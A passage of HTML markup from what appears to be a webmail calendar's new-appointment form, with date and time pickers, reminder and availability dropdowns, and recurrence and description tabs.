   <li class='htsItem htsLast' id='ctl00_TPH_TabStrip_Tab3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Categories</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$TabStrip$SelectedTab" id="ctl00_TPH_TabStrip_SelectedTab" value="ctl00_TPH_TabStrip_Tab1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_ctl00">
   
           
<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
                   <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_SubjectBox">
                   <td id="ctl00_MPH_SubjectBox_Label" class="Indent Fixed">Subject</td><td id="ctl00_MPH_SubjectBox_Setting" class="Setting"><input name="ctl00$MPH$SubjectBox_SettingText" type="text" id="ctl00_MPH_SubjectBox_SettingText" class="text" style="width:300px;" /></td>
               </tr><tr id="ctl00_MPH_InviteRow">
                   <td id="ctl00_MPH_InviteRow_Label" class="Indent Fixed"><a href="javascript: openpopupto();">Attendees</a></td><td class=" Setting"><div id="ctl00_MPH_InviteBox" class="RadComboBox RadComboBox_SmarterTools" style="width:300px;margin-left:-1px;margin-right:-1px;white-space:normal;">
                       <table cellpadding="0" cellspacing="0" summary="combobox" border="0" style="border-width:0;">
                           <tr>
                               <td class="rcbInputCell rcbInputCellLeft" style="width:100%;"><input name="ctl00$MPH$InviteBox" type="text" class="rcbInput" id="ctl00_MPH_InviteBox_Input" value="" /></td><td class="rcbArrowCell rcbArrowCellRight rcbArrowCellHidden"><a id="ctl00_MPH_InviteBox_Arrow" style="overflow: hidden;display: block;position: relative;outline: none;">select</a></td>
                           </tr>
                       </table><!-- 2010.2.817.35 --><div class="rcbSlide" style="z-index:6000;"><div id="ctl00_MPH_InviteBox_DropDown" class="RadComboBoxDropDown RadComboBoxDropDown_SmarterTools " style="display:none;"><div class="rcbScroll rcbWidth" style="width:100%;"></div></div></div><input id="ctl00_MPH_InviteBox_ClientState" name="ctl00_MPH_InviteBox_ClientState" type="hidden" />
                   </div>
                               &nbsp;
                               <a id="ctl00_MPH_lnkAvail" class="AvailabilityLink" href="javascript: DoAvailability();"><img src="/App_Themes/Default/Images/16x16/Gaant.gif" alt="Check Availability" style="border-width:0px;" /></a></td>
               </tr><tr id="ctl00_MPH_LocationBox">
                   <td id="ctl00_MPH_LocationBox_Label" class="Indent Fixed">Location</td><td id="ctl00_MPH_LocationBox_Setting" class="Setting"><input name="ctl00$MPH$LocationBox_SettingText" type="text" id="ctl00_MPH_LocationBox_SettingText" class="text" style="width:300px;" /></td>
               </tr><tr id="ctl00_MPH_StartDatePicker">
                   <td id="ctl00_MPH_StartDatePicker_Label" class="Indent Fixed">Start</td><td id="ctl00_MPH_StartDatePicker_Setting" class="Setting"><table border="0">
                       <tr>
                           <td><div id="ctl00_MPH_StartDatePicker_SettingText_wrapper" class="RadPicker RadPicker_SmarterTools DateTimePickerOverride" style="display:inline-block;width:160px;">
                               <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_StartDatePicker_SettingText" name="ctl00$MPH$StartDatePicker_SettingText" type="text" class="rdfd_" value="2010-10-03-09-15-00" /><table cellspacing="0" class="rcTable" style="width:160px;">
                                   <tr>
                                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_StartDatePicker_SettingText_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/3/2010 9:15 AM" id="ctl00_MPH_StartDatePicker_SettingText_dateInput_text" name="ctl00_MPH_StartDatePicker_SettingText_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_StartDatePicker_SettingText_dateInput" name="ctl00$MPH$StartDatePicker_SettingText$dateInput" type="text" class="rdfd_" value="2010-10-03-09-15-00" /><input id="ctl00_MPH_StartDatePicker_SettingText_dateInput_ClientState" name="ctl00_MPH_StartDatePicker_SettingText_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_StartDatePicker_SettingText_popupButton" onclick="return CalendarPopup($find('ctl00_MPH_StartDatePicker_SettingText'),'cal');"><img id="ctl00_MPH_StartDatePicker_SettingText_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_StartDatePicker_SettingText_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_StartDatePicker_SettingText_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
                                           <thead>
                                               <tr>
                                                   <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                                                       <tr>
                                                           <td><a id="ctl00_MPH_StartDatePicker_SettingText_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_StartDatePicker_SettingText_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_StartDatePicker_SettingText_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_StartDatePicker_SettingText_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_StartDatePicker_SettingText_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                                                       </tr>
                                                   </table></td>
                                               </tr>
                                           </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_StartDatePicker_SettingText_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
                                       </table><input type="hidden" name="ctl00_MPH_StartDatePicker_SettingText_calendar_SD" id="ctl00_MPH_StartDatePicker_SettingText_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_StartDatePicker_SettingText_calendar_AD" id="ctl00_MPH_StartDatePicker_SettingText_calendar_AD" value="[[1900,1,1],[2100,1,1],[2010,10,2]]" /></div></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_StartDatePicker_SettingText_timePopupLink" onclick="return CalendarPopup($find('ctl00_MPH_StartDatePicker_SettingText'),'time');"><img id="ctl00_MPH_StartDatePicker_SettingText_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_StartDatePicker_SettingText_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_StartDatePicker_SettingText_timeView">
                                           <table id="ctl00_MPH_StartDatePicker_SettingText_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools" cellspacing="0" border="0" style="width:250px;">
                                               <tr>
                                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                                               </tr><tr>
                                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                                               </tr>
                                           </table><input id="ctl00_MPH_StartDatePicker_SettingText_timeView_ClientState" name="ctl00_MPH_StartDatePicker_SettingText_timeView_ClientState" type="hidden" />
                                       </div></div></td>
                                   </tr>
                               </table><input id="ctl00_MPH_StartDatePicker_SettingText_ClientState" name="ctl00_MPH_StartDatePicker_SettingText_ClientState" type="hidden" />
                           </div></td><td></td>
                       </tr>
                   </table></td>
               </tr><tr id="ctl00_MPH_EndDatePicker">
                   <td id="ctl00_MPH_EndDatePicker_Label" class="Indent Fixed">End</td><td id="ctl00_MPH_EndDatePicker_Setting" class="Setting"><table border="0">
                       <tr>
                           <td><div id="ctl00_MPH_EndDatePicker_SettingText_wrapper" class="RadPicker RadPicker_SmarterTools DateTimePickerOverride" style="display:inline-block;width:160px;">
                               <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_EndDatePicker_SettingText" name="ctl00$MPH$EndDatePicker_SettingText" type="text" class="rdfd_" value="2010-10-03-10-15-00" /><table cellspacing="0" class="rcTable" style="width:160px;">
                                   <tr>
                                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_EndDatePicker_SettingText_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/3/2010 10:15 AM" id="ctl00_MPH_EndDatePicker_SettingText_dateInput_text" name="ctl00_MPH_EndDatePicker_SettingText_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_EndDatePicker_SettingText_dateInput" name="ctl00$MPH$EndDatePicker_SettingText$dateInput" type="text" class="rdfd_" value="2010-10-03-10-15-00" /><input id="ctl00_MPH_EndDatePicker_SettingText_dateInput_ClientState" name="ctl00_MPH_EndDatePicker_SettingText_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_EndDatePicker_SettingText_popupButton" onclick="return CalendarPopup($find('ctl00_MPH_EndDatePicker_SettingText'),'cal');"><img id="ctl00_MPH_EndDatePicker_SettingText_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_EndDatePicker_SettingText_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_EndDatePicker_SettingText_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
                                           <thead>
                                               <tr>
                                                   <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                                                       <tr>
                                                           <td><a id="ctl00_MPH_EndDatePicker_SettingText_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_EndDatePicker_SettingText_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_EndDatePicker_SettingText_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_EndDatePicker_SettingText_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_EndDatePicker_SettingText_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                                                       </tr>
                                                   </table></td>
                                               </tr>
                                           </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_EndDatePicker_SettingText_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
                                       </table><input type="hidden" name="ctl00_MPH_EndDatePicker_SettingText_calendar_SD" id="ctl00_MPH_EndDatePicker_SettingText_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_EndDatePicker_SettingText_calendar_AD" id="ctl00_MPH_EndDatePicker_SettingText_calendar_AD" value="[[1900,1,1],[2100,1,1],[2010,10,2]]" /></div></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_EndDatePicker_SettingText_timePopupLink" onclick="return CalendarPopup($find('ctl00_MPH_EndDatePicker_SettingText'),'time');"><img id="ctl00_MPH_EndDatePicker_SettingText_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_EndDatePicker_SettingText_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_EndDatePicker_SettingText_timeView">
                                           <table id="ctl00_MPH_EndDatePicker_SettingText_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools" cellspacing="0" border="0" style="width:250px;">
                                               <tr>
                                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                                               </tr><tr>
                                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                                               </tr><tr>
                                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                                               </tr>
                                           </table><input id="ctl00_MPH_EndDatePicker_SettingText_timeView_ClientState" name="ctl00_MPH_EndDatePicker_SettingText_timeView_ClientState" type="hidden" />
                                       </div></div></td>
                                   </tr>
                               </table><input id="ctl00_MPH_EndDatePicker_SettingText_ClientState" name="ctl00_MPH_EndDatePicker_SettingText_ClientState" type="hidden" />
                           </div></td><td></td>
                       </tr>
                   </table></td>
               </tr><tr id="ctl00_MPH_chkAllDay">
                   <td id="ctl00_MPH_chkAllDay_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkAllDay_Setting" class="Setting"><input id="ctl00_MPH_chkAllDay_SettingCheck" type="checkbox" name="ctl00$MPH$chkAllDay_SettingCheck" onclick="javascript:setTimeout('__doPostBack(\'ctl00$MPH$chkAllDay_SettingCheck\',\'\')', 0)" /><label for="ctl00_MPH_chkAllDay_SettingCheck">All Day Appointment</label></td>
               </tr><tr id="ctl00_MPH_AvailabilityDropDown">
                   <td id="ctl00_MPH_AvailabilityDropDown_Label" class="Indent Fixed">Availability</td><td id="ctl00_MPH_AvailabilityDropDown_Setting" class="Setting"><select name="ctl00$MPH$AvailabilityDropDown_SettingDropDown" id="ctl00_MPH_AvailabilityDropDown_SettingDropDown">
                       <option value="busy">Busy</option>
                       <option value="free">Free</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_ReminderDropDown">
                   <td id="ctl00_MPH_ReminderDropDown_Label" class="Indent Fixed">Reminder</td><td id="ctl00_MPH_ReminderDropDown_Setting" class="Setting"><select name="ctl00$MPH$ReminderDropDown_SettingDropDown" id="ctl00_MPH_ReminderDropDown_SettingDropDown">
                       <option value="None">None</option>
                       <option value="5 minutes">5 minutes</option>
                       <option selected="selected" value="10 minutes">10 minutes</option>
                       <option value="15 minutes">15 minutes</option>
                       <option value="30 minutes">30 minutes</option>
                       <option value="1 hour">1 hour</option>
                       <option value="2 hours">2 hours</option>
                       <option value="3 hours">3 hours</option>
                       <option value="4 hours">4 hours</option>
                       <option value="5 hours">5 hours</option>
                       <option value="6 hours">6 hours</option>
                       <option value="7 hours">7 hours</option>
                       <option value="8 hours">8 hours</option>
                       <option value="9 hours">9 hours</option>
                       <option value="10 hours">10 hours</option>
                       <option value="11 hours">11 hours</option>
                       <option value="12 hours">12 hours</option>
                       <option value="24 hours">24 hours</option>
                       <option value="2 days">2 days</option>
                       <option value="3 days">3 days</option>
                       <option value="4 days">4 days</option>
                       <option value="1 week">1 week</option>
                       <option value="2 weeks">2 weeks</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_txtEmailMe">
                   <td id="ctl00_MPH_txtEmailMe_Label" class="Indent Fixed">Email Notification</td><td id="ctl00_MPH_txtEmailMe_Setting" class="Setting"><input name="ctl00$MPH$txtEmailMe_SettingText" type="text" value="testit@hoytllc.com" id="ctl00_MPH_txtEmailMe_SettingText" class="text" style="width:300px;" /><input id="ctl00_MPH_ctl07" type="checkbox" name="ctl00$MPH$ctl07" /><label for="ctl00_MPH_ctl07">Enable</label></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_RecurTab' class='' style='display:none'>
           <span id="ctl00_MPH_RecurTab">
                   <div id="ctl00_MPH_RecurrenceArea">
                       <table class="SettingsContainer SCMarginTop" border="0">
               <tr>
                   <td class="Indent Fixed" style="vertical-align: top"><input id="ctl00_MPH_RadioOnce" type="radio" name="ctl00$MPH$Recur" value="RadioOnce" checked="checked" /><label for="ctl00_MPH_RadioOnce">Once</label><br />
                                   <input id="ctl00_MPH_RadioDaily" type="radio" name="ctl00$MPH$Recur" value="RadioDaily" onclick="javascript:setTimeout('__doPostBack(\'ctl00$MPH$RadioDaily\',\'\')', 0)" /><label for="ctl00_MPH_RadioDaily">Daily</label><br />
                                   <input id="ctl00_MPH_RadioWeekly" type="radio" name="ctl00$MPH$Recur" value="RadioWeekly" onclick="javascript:setTimeout('__doPostBack(\'ctl00$MPH$RadioWeekly\',\'\')', 0)" /><label for="ctl00_MPH_RadioWeekly">Weekly</label><br />
                                   <input id="ctl00_MPH_RadioMonthly" type="radio" name="ctl00$MPH$Recur" value="RadioMonthly" onclick="javascript:setTimeout('__doPostBack(\'ctl00$MPH$RadioMonthly\',\'\')', 0)" /><label for="ctl00_MPH_RadioMonthly">Monthly</label><br />
                                   <input id="ctl00_MPH_RadioYearly" type="radio" name="ctl00$MPH$Recur" value="RadioYearly" onclick="javascript:setTimeout('__doPostBack(\'ctl00$MPH$RadioYearly\',\'\')', 0)" /><label for="ctl00_MPH_RadioYearly">Yearly</label><br />
                               </td><td class="Setting"></td>
               </tr>
           </table>
                   </div>
               </span></div>
       
               <div id='ctl00_MPH_DescriptionTab' class='' style='display:none'>
           <span id="ctl00_MPH_DescriptionTab">
                   <table class="SettingsContainer SCMarginTop" border="0">
               <tr id="ctl00_MPH_DescriptionBox">
                   <td id="ctl00_MPH_DescriptionBox_Setting" class="Indent Setting" colspan="2"><span class='Label'>Description<br /></span><textarea name="ctl00$MPH$DescriptionBox_SettingText" rows="12" cols="50" id="ctl00_MPH_DescriptionBox_SettingText" class="text"></textarea></td>
               </tr>
           </table>
               </span></div>
       
               <div id='ctl00_MPH_pvCategories' class='' style='display:none'>
           <span id="ctl00_MPH_pvCategories">
                   <table id="ctl00_MPH_tblCategories" class="SettingsContainer SCMarginTop" border="0">
               <tr>
                   <td class="Setting Indent">No categories have been defined.</td>
               </tr>
           </table>
                   
                   
                   <a id="ctl00_MPH_lnkRefresh" href="javascript:__doPostBack('ctl00$MPH$lnkRefresh','')"></a>
               </span></div>
       
           </div>
   
           <input type="hidden" name="ctl00$MPH$HiddenGuid" id="ctl00_MPH_HiddenGuid" />
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
